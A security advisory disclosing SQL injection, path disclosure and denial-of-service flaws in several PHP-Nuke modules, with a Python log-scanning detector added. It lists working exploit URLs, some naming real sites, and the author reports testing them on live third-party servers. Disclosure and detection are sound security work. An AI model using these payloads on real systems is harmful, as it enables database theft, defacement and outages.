
PHP-Nuke Denial of Service attack and more SQL Injections

-------

Product: PHP-Nuke

Vendor: Francisco Burzi

Versions Vulnerable:

Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches,
6.0 with all patches,
5.5 with all patches



Not vulnerable:

?

------

DESCRIPTION:

------

New SQL injections and path disclosures related to the main modules.

Please note the trailing backtick (`) in the exploit URLs below: other PHP-Nuke SQL injections don't use it, but here it is essential for building a successful query.

--------

FOUND VULNERABLE MODULES:

--------



--------

- SECTIONS (NEW)

--------

Type: SQL Injection and Path Disclosure 

*********

Exploit:

http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)

-

http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] (NEW)



--------

-AVANTGO

--------

Type: SQL Injection and Path disclosure. (NEW)

*********

Exploit: 

http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]



--------

-SURVEYS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:



http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]

-

http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0



--------

-DOWNLOADS

--------

Type: SQL Injection and Path disclosure. (NEW)

********

Exploit:

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]

-

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD



-------------

NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)

-------------

I found a possible denial of service attack in the Downloads module through the rating system.

Exploit:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999999

When the file is rated, it gets a rating of 238,609,298.89. This can be used to mount a denial of service attack against the MySQL server or to send a very long buffer (buffer overflow, stack crashes). The MySQL server stores this value because there is an error with the query (more characters in the field than the allowed number of characters); if you send a buffer longer than the allowed/accepted size, the server becomes unstable and the system hangs.



Exploit to SQL Injection and Denial of Service Attack:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]



--------

- REVIEWS (NEW)

--------

Type: SQL Injection and Path disclosure.

********

Exploit:

http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]

--------

- WEB_LINKS

--------

Type: SQL Injection (NEW) and Path disclosure. (NEW)

********

Exploit:

http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]

-

http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num



- The Web_Links module is affected by the possible DoS attack that I discovered, and by the SQL injections and buffer overflows:

Exploit:

http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]

[DATA] = your random data to send (rating points and the field buffer, of course).

--------

SOLUTION:

--------

- Deactivate the affected modules entirely.

- A temporary workaround for the path disclosure is to configure the error reporting flags in php.ini (no reporting), but this is not a very good solution (WORKAROUND).
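As an added detection example (not part of the advisory), the following Python scans web-server access log lines for the request shapes described above: a backtick or non-numeric value in the numeric PHP-Nuke module parameters this advisory lists, and an oversized `rating` value. The parameter names come from the advisory; the two-digit rating cap, the log format, the addresses and the sample lines are constructed assumptions.

```python
"""Flag access-log requests matching the PHP-Nuke patterns in this advisory."""
import re
from urllib.parse import urlparse, parse_qs

# Query parameters the advisory shows reaching SQL; all are numeric IDs in PHP-Nuke.
NUMERIC_PARAMS = {"secid", "artid", "sid", "pollID", "cid", "id",
                  "ratenum", "ratinglid", "rating"}
# Assumed cap: legitimate ratings are small integers; the DoS sends a huge digit run.
MAX_RATING_DIGITS = 2
# Request field of a common/combined log line: "GET /path?query HTTP/1.0"
_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return findings for one request target; an empty list means clean."""
    findings = []
    parsed = urlparse(target)
    if not parsed.path.endswith("modules.php"):
        return findings
    # parse_qs percent-decodes, so %60 becomes a literal backtick here.
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        if name not in NUMERIC_PARAMS:
            continue
        for value in values:
            if "`" in value:
                findings.append("%s: backtick in numeric parameter" % name)
            elif not value.isdigit():
                findings.append("%s: non-numeric value %r" % (name, value))
            elif name == "rating" and len(value) > MAX_RATING_DIGITS:
                findings.append("rating: oversized value (%d digits)" % len(value))
    return findings

def scan_log(lines):
    """Return (line_number, findings) for each log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _REQUEST.search(line)
        if match:
            findings = check_request(match.group(1))
            if findings:
                hits.append((number, findings))
    return hits

# Constructed sample log lines (not from the advisory); addresses are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2003:10:00:01 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=12 HTTP/1.0" 200 5120',
    '198.51.100.8 - - [01/Jan/2003:10:00:02 +0000] "GET /modules.php?name=Sections&op=viewarticle&artid=%60test HTTP/1.0" 200 812',
    '198.51.100.9 - - [01/Jan/2003:10:00:03 +0000] "GET /modules.php?name=Downloads&ratinglid=4&ratinguser=x&ratinghost_name=x&rating=999999999999999999 HTTP/1.0" 302 0',
    '198.51.100.9 - - [01/Jan/2003:10:00:04 +0000] "GET /index.php?cid=%60 HTTP/1.0" 200 100',
]
```

`scan_log(SAMPLE_LOG)` flags lines 2 (backtick in `artid`) and 3 (oversized `rating`) and leaves the benign request and the non-modules.php request alone.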

-----

WHAT CAN HAPPEN? AND NOTES

-----

Gain access to the PHP-Nuke database, content changing, gain access to private info, server paths revealed. MySQL server buffer overflow, MySQL server hang, server hang.

-NOTES-

I tested it on phpnuke-espanol.org and it is vulnerable to all of them.

I tested it on phpnuke.org and it is vulnerable in the active modules affected by this (Downloads, Surveys) (some errors aren't reported because php.ini is configured for this, but the vulnerabilities are present).

-----

CONTACT INFO :

---------------------------------------

Lorenzo Manuel Hernandez Garcia-Hierro

--- Computer Security Analyzer ---

--www.novappc.com --

PGP: Keyfingerprint

B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2

ID: 0x9C38E1D7

**********************************
